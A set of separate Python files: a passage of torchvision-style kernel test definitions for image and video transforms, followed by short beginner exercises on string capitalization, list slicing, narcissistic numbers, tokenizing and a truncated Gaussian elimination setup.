reference_inputs_fn=reference_inputs_perspective_mask,
float32_vs_uint8=True,
closeness_kwargs={
(("TestKernels", "test_against_reference"), torch.uint8, "cpu"): dict(atol=10, rtol=0),
},
),
KernelInfo(
F.perspective_video,
sample_inputs_fn=sample_inputs_perspective_video,
closeness_kwargs={
**cuda_vs_cpu_pixel_difference(),
**scripted_vs_eager_float64_tolerances("cpu", atol=1e-5, rtol=1e-5),
**scripted_vs_eager_float64_tolerances("cuda", atol=1e-5, rtol=1e-5),
},
),
]
)
def _get_elastic_displacement(canvas_size):
return torch.rand(1, *canvas_size, 2)
def sample_inputs_elastic_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE]):
displacement = _get_elastic_displacement(image_loader.canvas_size)
for fill in get_fills(num_channels=image_loader.num_channels, dtype=image_loader.dtype):
yield ArgsKwargs(image_loader, displacement=displacement, fill=fill)
def reference_inputs_elastic_image_tensor():
for image_loader, interpolation in itertools.product(
make_image_loaders_for_interpolation(),
[
F.InterpolationMode.NEAREST,
F.InterpolationMode.BILINEAR,
F.InterpolationMode.BICUBIC,
],
):
displacement = _get_elastic_displacement(image_loader.canvas_size)
for fill in get_fills(num_channels=image_loader.num_channels, dtype=image_loader.dtype):
yield ArgsKwargs(image_loader, interpolation=interpolation, displacement=displacement, fill=fill)
def sample_inputs_elastic_bounding_boxes():
for bounding_boxes_loader in make_bounding_box_loaders():
displacement = _get_elastic_displacement(bounding_boxes_loader.canvas_size)
yield ArgsKwargs(
bounding_boxes_loader,
format=bounding_boxes_loader.format,
canvas_size=bounding_boxes_loader.canvas_size,
displacement=displacement,
)
def sample_inputs_elastic_mask():
for mask_loader in make_mask_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE]):
displacement = _get_elastic_displacement(mask_loader.shape[-2:])
yield ArgsKwargs(mask_loader, displacement=displacement)
def sample_inputs_elastic_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
displacement = _get_elastic_displacement(video_loader.shape[-2:])
yield ArgsKwargs(video_loader, displacement=displacement)
KERNEL_INFOS.extend(
[
KernelInfo(
F.elastic_image,
sample_inputs_fn=sample_inputs_elastic_image_tensor,
reference_inputs_fn=reference_inputs_elastic_image_tensor,
float32_vs_uint8=float32_vs_uint8_fill_adapter,
closeness_kwargs={
**float32_vs_uint8_pixel_difference(6, mae=True),
**cuda_vs_cpu_pixel_difference(),
},
test_marks=[xfail_jit_python_scalar_arg("fill")],
),
KernelInfo(
F.elastic_bounding_boxes,
sample_inputs_fn=sample_inputs_elastic_bounding_boxes,
),
KernelInfo(
F.elastic_mask,
sample_inputs_fn=sample_inputs_elastic_mask,
),
KernelInfo(
F.elastic_video,
sample_inputs_fn=sample_inputs_elastic_video,
closeness_kwargs=cuda_vs_cpu_pixel_difference(),
),
]
)
_CENTER_CROP_SPATIAL_SIZES = [(16, 16), (7, 33), (31, 9)]
_CENTER_CROP_OUTPUT_SIZES = [[4, 3], [42, 70], [4], 3, (5, 2), (6,)]
def sample_inputs_center_crop_image_tensor():
for image_loader, output_size in itertools.product(
make_image_loaders(sizes=[(16, 17)], color_spaces=["RGB"], dtypes=[torch.float32]),
[
# valid `output_size` types for which cropping is applied to both dimensions
*[5, (4,), (2, 3), [6], [3, 2]],
# `output_size`'s for which at least one dimension needs to be padded
*[[4, 18], [17, 5], [17, 18]],
],
):
yield ArgsKwargs(image_loader, output_size=output_size)
def reference_inputs_center_crop_image_tensor():
for image_loader, output_size in itertools.product(
make_image_loaders(sizes=_CENTER_CROP_SPATIAL_SIZES, extra_dims=[()], dtypes=[torch.uint8]),
_CENTER_CROP_OUTPUT_SIZES,
):
yield ArgsKwargs(image_loader, output_size=output_size)
def sample_inputs_center_crop_bounding_boxes():
for bounding_boxes_loader, output_size in itertools.product(make_bounding_box_loaders(), _CENTER_CROP_OUTPUT_SIZES):
yield ArgsKwargs(
bounding_boxes_loader,
format=bounding_boxes_loader.format,
canvas_size=bounding_boxes_loader.canvas_size,
output_size=output_size,
)
def sample_inputs_center_crop_mask():
for mask_loader in make_mask_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_categories=[10], num_objects=[5]):
height, width = mask_loader.shape[-2:]
yield ArgsKwargs(mask_loader, output_size=(height // 2, width // 2))
def reference_inputs_center_crop_mask():
for mask_loader, output_size in itertools.product(
make_mask_loaders(sizes=_CENTER_CROP_SPATIAL_SIZES, extra_dims=[()], num_objects=[1]), _CENTER_CROP_OUTPUT_SIZES
):
yield ArgsKwargs(mask_loader, output_size=output_size)
def sample_inputs_center_crop_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
height, width = video_loader.shape[-2:]
yield ArgsKwargs(video_loader, output_size=(height // 2, width // 2))
KERNEL_INFOS.extend(
[
KernelInfo(
F.center_crop_image,
sample_inputs_fn=sample_inputs_center_crop_image_tensor,
reference_fn=pil_reference_wrapper(F._center_crop_image_pil),
reference_inputs_fn=reference_inputs_center_crop_image_tensor,
float32_vs_uint8=True,
test_marks=[
xfail_jit_python_scalar_arg("output_size"),
],
),
KernelInfo(
F.center_crop_bounding_boxes,
sample_inputs_fn=sample_inputs_center_crop_bounding_boxes,
test_marks=[
xfail_jit_python_scalar_arg("output_size"),
],
),
KernelInfo(
F.center_crop_mask,
sample_inputs_fn=sample_inputs_center_crop_mask,
reference_fn=pil_reference_wrapper(F._center_crop_image_pil),
reference_inputs_fn=reference_inputs_center_crop_mask,
float32_vs_uint8=True,
test_marks=[
xfail_jit_python_scalar_arg("output_size"),
],
),
KernelInfo(
F.center_crop_video,
sample_inputs_fn=sample_inputs_center_crop_video,
),
]
)
def sample_inputs_gaussian_blur_image_tensor():
make_gaussian_blur_image_loaders = functools.partial(make_image_loaders, sizes=[(7, 33)], color_spaces=["RGB"])
for image_loader, kernel_size in itertools.product(make_gaussian_blur_image_loaders(), [5, (3, 3), [3, 3]]):
yield ArgsKwargs(image_loader, kernel_size=kernel_size)
for image_loader, sigma in itertools.product(
make_gaussian_blur_image_loaders(), [None, (3.0, 3.0), [2.0, 2.0], 4.0, [1.5], (3.14,)]
):
yield ArgsKwargs(image_loader, kernel_size=5, sigma=sigma)
def sample_inputs_gaussian_blur_video():
for video_loader in make_video_loaders(sizes=[(7, 33)], num_frames=[5]):
yield ArgsKwargs(video_loader, kernel_size=[3, 3])
KERNEL_INFOS.extend(
[
KernelInfo(
F.gaussian_blur_image,
sample_inputs_fn=sample_inputs_gaussian_blur_image_tensor,
closeness_kwargs=cuda_vs_cpu_pixel_difference(),
test_marks=[
xfail_jit_python_scalar_arg("kernel_size"),
xfail_jit_python_scalar_arg("sigma"),
],
),
KernelInfo(
F.gaussian_blur_video,
sample_inputs_fn=sample_inputs_gaussian_blur_video,
closeness_kwargs=cuda_vs_cpu_pixel_difference(),
),
]
)
def sample_inputs_equalize_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
yield ArgsKwargs(image_loader)
def reference_inputs_equalize_image_tensor():
# We are not using `make_image_loaders` here since that uniformly samples the values over the whole value range.
# Since the whole point of this kernel is to transform an arbitrary distribution of values into a uniform one,
# the information gain is low if we already provide something really close to the expected value.
def make_uniform_band_image(shape, dtype, device, *, low_factor, high_factor, memory_format):
if dtype.is_floating_point:
low = low_factor
high = high_factor
else:
max_value = torch.iinfo(dtype).max
low = int(low_factor * max_value)
high = int(high_factor * max_value)
return torch.testing.make_tensor(shape, dtype=dtype, device=device, low=low, high=high).to(
memory_format=memory_format, copy=True
)
def make_beta_distributed_image(shape, dtype, device, *, alpha, beta, memory_format):
image = torch.distributions.Beta(alpha, beta).sample(shape)
if not dtype.is_floating_point:
image.mul_(torch.iinfo(dtype).max).round_()
return image.to(dtype=dtype, device=device, memory_format=memory_format, copy=True)
canvas_size = (256, 256)
for dtype, color_space, fn in itertools.product(
[torch.uint8],
["GRAY", "RGB"],
[
lambda shape, dtype, device, memory_format: torch.zeros(shape, dtype=dtype, device=device).to(
memory_format=memory_format, copy=True
),
lambda shape, dtype, device, memory_format: torch.full(
shape, 1.0 if dtype.is_floating_point else torch.iinfo(dtype).max, dtype=dtype, device=device
).to(memory_format=memory_format, copy=True),
*[
functools.partial(make_uniform_band_image, low_factor=low_factor, high_factor=high_factor)
for low_factor, high_factor in [
(0.0, 0.25),
(0.25, 0.75),
(0.75, 1.0),
]
],
*[
functools.partial(make_beta_distributed_image, alpha=alpha, beta=beta)
for alpha, beta in [
(0.5, 0.5),
(2, 2),
(2, 5),
(5, 2),
]
],
],
):
image_loader = ImageLoader(fn, shape=(get_num_channels(color_space), *canvas_size), dtype=dtype)
yield ArgsKwargs(image_loader)
def sample_inputs_equalize_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader)
KERNEL_INFOS.extend(
[
KernelInfo(
F.equalize_image,
kernel_name="equalize_image_tensor",
sample_inputs_fn=sample_inputs_equalize_image_tensor,
reference_fn=pil_reference_wrapper(F._equalize_image_pil),
float32_vs_uint8=True,
reference_inputs_fn=reference_inputs_equalize_image_tensor,
),
KernelInfo(
F.equalize_video,
sample_inputs_fn=sample_inputs_equalize_video,
),
]
)
def sample_inputs_invert_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
yield ArgsKwargs(image_loader)
def reference_inputs_invert_image_tensor():
for image_loader in make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]):
yield ArgsKwargs(image_loader)
def sample_inputs_invert_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader)
KERNEL_INFOS.extend(
[
KernelInfo(
F.invert_image,
kernel_name="invert_image_tensor",
sample_inputs_fn=sample_inputs_invert_image_tensor,
reference_fn=pil_reference_wrapper(F._invert_image_pil),
reference_inputs_fn=reference_inputs_invert_image_tensor,
float32_vs_uint8=True,
),
KernelInfo(
F.invert_video,
sample_inputs_fn=sample_inputs_invert_video,
),
]
)
_POSTERIZE_BITS = [1, 4, 8]
def sample_inputs_posterize_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
yield ArgsKwargs(image_loader, bits=_POSTERIZE_BITS[0])
def reference_inputs_posterize_image_tensor():
for image_loader, bits in itertools.product(
make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
_POSTERIZE_BITS,
):
yield ArgsKwargs(image_loader, bits=bits)
def sample_inputs_posterize_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, bits=_POSTERIZE_BITS[0])
KERNEL_INFOS.extend(
[
KernelInfo(
F.posterize_image,
kernel_name="posterize_image_tensor",
sample_inputs_fn=sample_inputs_posterize_image_tensor,
reference_fn=pil_reference_wrapper(F._posterize_image_pil),
reference_inputs_fn=reference_inputs_posterize_image_tensor,
float32_vs_uint8=True,
closeness_kwargs=float32_vs_uint8_pixel_difference(),
),
KernelInfo(
F.posterize_video,
sample_inputs_fn=sample_inputs_posterize_video,
),
]
)
def _get_solarize_thresholds(dtype):
for factor in [0.1, 0.5]:
max_value = get_max_value(dtype)
yield (float if dtype.is_floating_point else int)(max_value * factor)
def sample_inputs_solarize_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
yield ArgsKwargs(image_loader, threshold=next(_get_solarize_thresholds(image_loader.dtype)))
def reference_inputs_solarize_image_tensor():
for image_loader in make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]):
for threshold in _get_solarize_thresholds(image_loader.dtype):
yield ArgsKwargs(image_loader, threshold=threshold)
def uint8_to_float32_threshold_adapter(other_args, kwargs):
return other_args, dict(threshold=kwargs["threshold"] / 255)
def sample_inputs_solarize_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, threshold=next(_get_solarize_thresholds(video_loader.dtype)))
KERNEL_INFOS.extend(
[
KernelInfo(
F.solarize_image,
kernel_name="solarize_image_tensor",
sample_inputs_fn=sample_inputs_solarize_image_tensor,
reference_fn=pil_reference_wrapper(F._solarize_image_pil),
reference_inputs_fn=reference_inputs_solarize_image_tensor,
float32_vs_uint8=uint8_to_float32_threshold_adapter,
closeness_kwargs=float32_vs_uint8_pixel_difference(),
),
KernelInfo(
F.solarize_video,
sample_inputs_fn=sample_inputs_solarize_video,
),
]
)
def sample_inputs_autocontrast_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
yield ArgsKwargs(image_loader)
def reference_inputs_autocontrast_image_tensor():
for image_loader in make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]):
yield ArgsKwargs(image_loader)
def sample_inputs_autocontrast_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader)
KERNEL_INFOS.extend(
[
KernelInfo(
F.autocontrast_image,
kernel_name="autocontrast_image_tensor",
sample_inputs_fn=sample_inputs_autocontrast_image_tensor,
reference_fn=pil_reference_wrapper(F._autocontrast_image_pil),
reference_inputs_fn=reference_inputs_autocontrast_image_tensor,
float32_vs_uint8=True,
closeness_kwargs={
**pil_reference_pixel_difference(),
**float32_vs_uint8_pixel_difference(),
},
),
KernelInfo(
F.autocontrast_video,
sample_inputs_fn=sample_inputs_autocontrast_video,
),
]
)
_ADJUST_SHARPNESS_FACTORS = [0.1, 0.5]
def sample_inputs_adjust_sharpness_image_tensor():
for image_loader in make_image_loaders(
sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE, (2, 2)],
color_spaces=("GRAY", "RGB"),
):
yield ArgsKwargs(image_loader, sharpness_factor=_ADJUST_SHARPNESS_FACTORS[0])
def reference_inputs_adjust_sharpness_image_tensor():
for image_loader, sharpness_factor in itertools.product(
make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
_ADJUST_SHARPNESS_FACTORS,
):
yield ArgsKwargs(image_loader, sharpness_factor=sharpness_factor)
def sample_inputs_adjust_sharpness_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, sharpness_factor=_ADJUST_SHARPNESS_FACTORS[0])
KERNEL_INFOS.extend(
[
KernelInfo(
F.adjust_sharpness_image,
kernel_name="adjust_sharpness_image_tensor",
sample_inputs_fn=sample_inputs_adjust_sharpness_image_tensor,
reference_fn=pil_reference_wrapper(F._adjust_sharpness_image_pil),
reference_inputs_fn=reference_inputs_adjust_sharpness_image_tensor,
float32_vs_uint8=True,
closeness_kwargs=float32_vs_uint8_pixel_difference(2),
),
KernelInfo(
F.adjust_sharpness_video,
sample_inputs_fn=sample_inputs_adjust_sharpness_video,
),
]
)
_ADJUST_CONTRAST_FACTORS = [0.1, 0.5]
def sample_inputs_adjust_contrast_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
yield ArgsKwargs(image_loader, contrast_factor=_ADJUST_CONTRAST_FACTORS[0])
def reference_inputs_adjust_contrast_image_tensor():
for image_loader, contrast_factor in itertools.product(
make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
_ADJUST_CONTRAST_FACTORS,
):
yield ArgsKwargs(image_loader, contrast_factor=contrast_factor)
def sample_inputs_adjust_contrast_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, contrast_factor=_ADJUST_CONTRAST_FACTORS[0])
KERNEL_INFOS.extend(
[
KernelInfo(
F.adjust_contrast_image,
kernel_name="adjust_contrast_image_tensor",
sample_inputs_fn=sample_inputs_adjust_contrast_image_tensor,
reference_fn=pil_reference_wrapper(F._adjust_contrast_image_pil),
reference_inputs_fn=reference_inputs_adjust_contrast_image_tensor,
float32_vs_uint8=True,
closeness_kwargs={
**pil_reference_pixel_difference(),
**float32_vs_uint8_pixel_difference(2),
**cuda_vs_cpu_pixel_difference(),
(("TestKernels", "test_against_reference"), torch.uint8, "cpu"): pixel_difference_closeness_kwargs(1),
},
),
KernelInfo(
F.adjust_contrast_video,
sample_inputs_fn=sample_inputs_adjust_contrast_video,
closeness_kwargs={
**cuda_vs_cpu_pixel_difference(),
(("TestKernels", "test_against_reference"), torch.uint8, "cpu"): pixel_difference_closeness_kwargs(1),
},
),
]
)
_ADJUST_GAMMA_GAMMAS_GAINS = [
(0.5, 2.0),
(0.0, 1.0),
]
def sample_inputs_adjust_gamma_image_tensor():
gamma, gain = _ADJUST_GAMMA_GAMMAS_GAINS[0]
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
yield ArgsKwargs(image_loader, gamma=gamma, gain=gain)
def reference_inputs_adjust_gamma_image_tensor():
for image_loader, (gamma, gain) in itertools.product(
make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
_ADJUST_GAMMA_GAMMAS_GAINS,
):
yield ArgsKwargs(image_loader, gamma=gamma, gain=gain)
def sample_inputs_adjust_gamma_video():
gamma, gain = _ADJUST_GAMMA_GAMMAS_GAINS[0]
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, gamma=gamma, gain=gain)
KERNEL_INFOS.extend(
[
KernelInfo(
F.adjust_gamma_image,
kernel_name="adjust_gamma_image_tensor",
sample_inputs_fn=sample_inputs_adjust_gamma_image_tensor,
reference_fn=pil_reference_wrapper(F._adjust_gamma_image_pil),
reference_inputs_fn=reference_inputs_adjust_gamma_image_tensor,
float32_vs_uint8=True,
closeness_kwargs={
**pil_reference_pixel_difference(),
**float32_vs_uint8_pixel_difference(),
},
),
KernelInfo(
F.adjust_gamma_video,
sample_inputs_fn=sample_inputs_adjust_gamma_video,
),
]
)
_ADJUST_HUE_FACTORS = [-0.1, 0.5]
def sample_inputs_adjust_hue_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
yield ArgsKwargs(image_loader, hue_factor=_ADJUST_HUE_FACTORS[0])
def reference_inputs_adjust_hue_image_tensor():
for image_loader, hue_factor in itertools.product(
make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
_ADJUST_HUE_FACTORS,
):
yield ArgsKwargs(image_loader, hue_factor=hue_factor)
def sample_inputs_adjust_hue_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, hue_factor=_ADJUST_HUE_FACTORS[0])
KERNEL_INFOS.extend(
[
KernelInfo(
F.adjust_hue_image,
kernel_name="adjust_hue_image_tensor",
sample_inputs_fn=sample_inputs_adjust_hue_image_tensor,
reference_fn=pil_reference_wrapper(F._adjust_hue_image_pil),
reference_inputs_fn=reference_inputs_adjust_hue_image_tensor,
float32_vs_uint8=True,
closeness_kwargs={
**pil_reference_pixel_difference(2, mae=True),
**float32_vs_uint8_pixel_difference(),
},
),
KernelInfo(
F.adjust_hue_video,
sample_inputs_fn=sample_inputs_adjust_hue_video,
),
]
)
_ADJUST_SATURATION_FACTORS = [0.1, 0.5]
def sample_inputs_adjust_saturation_image_tensor():
for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
yield ArgsKwargs(image_loader, saturation_factor=_ADJUST_SATURATION_FACTORS[0])
def reference_inputs_adjust_saturation_image_tensor():
for image_loader, saturation_factor in itertools.product(
make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
_ADJUST_SATURATION_FACTORS,
):
yield ArgsKwargs(image_loader, saturation_factor=saturation_factor)
def sample_inputs_adjust_saturation_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, saturation_factor=_ADJUST_SATURATION_FACTORS[0])
KERNEL_INFOS.extend(
[
KernelInfo(
F.adjust_saturation_image,
kernel_name="adjust_saturation_image_tensor",
sample_inputs_fn=sample_inputs_adjust_saturation_image_tensor,
reference_fn=pil_reference_wrapper(F._adjust_saturation_image_pil),
reference_inputs_fn=reference_inputs_adjust_saturation_image_tensor,
float32_vs_uint8=True,
closeness_kwargs={
**pil_reference_pixel_difference(),
**float32_vs_uint8_pixel_difference(2),
**cuda_vs_cpu_pixel_difference(),
},
),
KernelInfo(
F.adjust_saturation_video,
sample_inputs_fn=sample_inputs_adjust_saturation_video,
closeness_kwargs=cuda_vs_cpu_pixel_difference(),
),
]
)
def sample_inputs_clamp_bounding_boxes():
for bounding_boxes_loader in make_bounding_box_loaders():
yield ArgsKwargs(
bounding_boxes_loader,
format=bounding_boxes_loader.format,
canvas_size=bounding_boxes_loader.canvas_size,
)
KERNEL_INFOS.append(
KernelInfo(
F.clamp_bounding_boxes,
sample_inputs_fn=sample_inputs_clamp_bounding_boxes,
logs_usage=True,
)
)
_FIVE_TEN_CROP_SIZES = [7, (6,), [5], (6, 5), [7, 6]]
def _get_five_ten_crop_canvas_size(size):
if isinstance(size, int):
crop_height = crop_width = size
elif len(size) == 1:
crop_height = crop_width = size[0]
else:
crop_height, crop_width = size
return 2 * crop_height, 2 * crop_width
def sample_inputs_five_crop_image_tensor():
for size in _FIVE_TEN_CROP_SIZES:
for image_loader in make_image_loaders(
sizes=[_get_five_ten_crop_canvas_size(size)],
color_spaces=["RGB"],
dtypes=[torch.float32],
):
yield ArgsKwargs(image_loader, size=size)
def reference_inputs_five_crop_image_tensor():
for size in _FIVE_TEN_CROP_SIZES:
for image_loader in make_image_loaders(
sizes=[_get_five_ten_crop_canvas_size(size)], extra_dims=[()], dtypes=[torch.uint8]
):
yield ArgsKwargs(image_loader, size=size)
def sample_inputs_five_crop_video():
size = _FIVE_TEN_CROP_SIZES[0]
for video_loader in make_video_loaders(sizes=[_get_five_ten_crop_canvas_size(size)]):
yield ArgsKwargs(video_loader, size=size)
def sample_inputs_ten_crop_image_tensor():
for size, vertical_flip in itertools.product(_FIVE_TEN_CROP_SIZES, [False, True]):
for image_loader in make_image_loaders(
sizes=[_get_five_ten_crop_canvas_size(size)],
color_spaces=["RGB"],
dtypes=[torch.float32],
):
yield ArgsKwargs(image_loader, size=size, vertical_flip=vertical_flip)
def reference_inputs_ten_crop_image_tensor():
for size, vertical_flip in itertools.product(_FIVE_TEN_CROP_SIZES, [False, True]):
for image_loader in make_image_loaders(
sizes=[_get_five_ten_crop_canvas_size(size)], extra_dims=[()], dtypes=[torch.uint8]
):
yield ArgsKwargs(image_loader, size=size, vertical_flip=vertical_flip)
def sample_inputs_ten_crop_video():
size = _FIVE_TEN_CROP_SIZES[0]
for video_loader in make_video_loaders(sizes=[_get_five_ten_crop_canvas_size(size)]):
yield ArgsKwargs(video_loader, size=size)
def multi_crop_pil_reference_wrapper(pil_kernel):
def wrapper(input_tensor, *other_args, **kwargs):
output = pil_reference_wrapper(pil_kernel)(input_tensor, *other_args, **kwargs)
return type(output)(
F.to_dtype_image(F.to_image(output_pil), dtype=input_tensor.dtype, scale=True) for output_pil in output
)
return wrapper
_common_five_ten_crop_marks = [
xfail_jit_python_scalar_arg("size"),
mark_framework_limitation(("TestKernels", "test_batched_vs_single"), "Custom batching needed."),
]
KERNEL_INFOS.extend(
[
KernelInfo(
F.five_crop_image,
sample_inputs_fn=sample_inputs_five_crop_image_tensor,
reference_fn=multi_crop_pil_reference_wrapper(F._five_crop_image_pil),
reference_inputs_fn=reference_inputs_five_crop_image_tensor,
test_marks=_common_five_ten_crop_marks,
),
KernelInfo(
F.five_crop_video,
sample_inputs_fn=sample_inputs_five_crop_video,
test_marks=_common_five_ten_crop_marks,
),
KernelInfo(
F.ten_crop_image,
sample_inputs_fn=sample_inputs_ten_crop_image_tensor,
reference_fn=multi_crop_pil_reference_wrapper(F._ten_crop_image_pil),
reference_inputs_fn=reference_inputs_ten_crop_image_tensor,
test_marks=_common_five_ten_crop_marks,
),
KernelInfo(
F.ten_crop_video,
sample_inputs_fn=sample_inputs_ten_crop_video,
test_marks=_common_five_ten_crop_marks,
),
]
)
_NORMALIZE_MEANS_STDS = [
((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
([0.0, 0.0, 0.0], [1.0, 1.0, 1.0]),
(0.5, 2.0),
]
def sample_inputs_normalize_image_tensor():
for image_loader, (mean, std) in itertools.product(
make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=["RGB"], dtypes=[torch.float32]),
_NORMALIZE_MEANS_STDS,
):
yield ArgsKwargs(image_loader, mean=mean, std=std)
def reference_normalize_image_tensor(image, mean, std, inplace=False):
mean = torch.tensor(mean).view(-1, 1, 1)
std = torch.tensor(std).view(-1, 1, 1)
sub = torch.Tensor.sub_ if inplace else torch.Tensor.sub
return sub(image, mean).div_(std)
def reference_inputs_normalize_image_tensor():
yield ArgsKwargs(
make_image_loader(size=(32, 32), color_space="RGB", extra_dims=[1]),
mean=[0.5, 0.5, 0.5],
std=[1.0, 1.0, 1.0],
)
def sample_inputs_normalize_video():
mean, std = _NORMALIZE_MEANS_STDS[0]
for video_loader in make_video_loaders(
sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=["RGB"], num_frames=[3], dtypes=[torch.float32]
):
yield ArgsKwargs(video_loader, mean=mean, std=std)
KERNEL_INFOS.extend(
[
KernelInfo(
F.normalize_image,
kernel_name="normalize_image_tensor",
sample_inputs_fn=sample_inputs_normalize_image_tensor,
reference_fn=reference_normalize_image_tensor,
reference_inputs_fn=reference_inputs_normalize_image_tensor,
test_marks=[
xfail_jit_python_scalar_arg("mean"),
xfail_jit_python_scalar_arg("std"),
],
),
KernelInfo(
F.normalize_video,
sample_inputs_fn=sample_inputs_normalize_video,
),
]
)
def sample_inputs_uniform_temporal_subsample_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[4]):
yield ArgsKwargs(video_loader, num_samples=2)
def reference_uniform_temporal_subsample_video(x, num_samples):
# Copy-pasted from
# https://github.com/facebookresearch/pytorchvideo/blob/c8d23d8b7e597586a9e2d18f6ed31ad8aa379a7a/pytorchvideo/transforms/functional.py#L19
t = x.shape[-4]
assert num_samples > 0 and t > 0
# Sample by nearest neighbor interpolation if num_samples > t.
indices = torch.linspace(0, t - 1, num_samples)
indices = torch.clamp(indices, 0, t - 1).long()
return torch.index_select(x, -4, indices)
def reference_inputs_uniform_temporal_subsample_video():
for video_loader in make_video_loaders(
sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=["RGB"], num_frames=[10]
):
for num_samples in range(1, video_loader.shape[-4] + 1):
yield ArgsKwargs(video_loader, num_samples)
KERNEL_INFOS.append(
KernelInfo(
F.uniform_temporal_subsample_video,
sample_inputs_fn=sample_inputs_uniform_temporal_subsample_video,
reference_fn=reference_uniform_temporal_subsample_video,
reference_inputs_fn=reference_inputs_uniform_temporal_subsample_video,
)
)
|
if __name__ == '__main__':
s = "chris alan"
a = s.split(' ')
r = ''
for p in a:
r += ' ' + p.capitalize()
print(r[1:])
|
#coding:gb2312
#切片练习题和for循环温习
fruits=['banana','watermelon','apple','strawberry','orange']
friend_fruits=fruits[:]#切片复制列表
fruits.append('litchi')
friend_fruits.append('peach')#各自添加
print("My favorite fruits are :")
for items in fruits:
print(items)
print(fruits)
print("\nMy friend favorite fruits are :")
for items in friend_fruits:
print(items)
print(friend_fruits)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
题目:打印出所有的"水仙花数",所谓"水仙花数"是指一个三位数,其各位数字立方和等于该数本身。
例如:153是一个"水仙花数",因为153=1的三次方+5的三次方+3的三次方。
程序分析:利用for循环控制100-999个数,每个数分解出个位,十位,百位。。
"""
print
for i in range(100, 1000, 1):
x = i / 100
y = i / 10 % 10
z = i % 10
# print z, y, z, i
if i == x**3 + y**3 + z**3:
print x, y, z, i
|
import sys
def tokenize(file_name):
"""Converts text file to list of tokens
Params: file_name - file to tokenized
str -> list
"""
tokens = []
with open(file_name) as file:
words = file.read().split(" ")
for word in words:
tokens.append(word)
tokens.pop()
return tokens
if __name__ == "__main__":
file_name = sys.argv[1]
result = tokenize(file_name)
print(result)
print(len(result))
|
import numpy as np
A = np.array([[4,-1,-1,0],
[-1,4,0,-1],
[-1,0,4,-1],
[0,-1,-1,4]])
B = np.array([[30],
[60],
[40],
[70]])
casicero = 1e-15
# Evitar truncamiento
A = np.array(A, dtype=float)
AB = np.concatenate((A, B), axis=1)
AB0 = np.copy(AB)
# Pivoteo parcial por filas
tamano = np.shape(AB)
n = tamano[0]
m = tamano[1]
# Para cada fila en AB
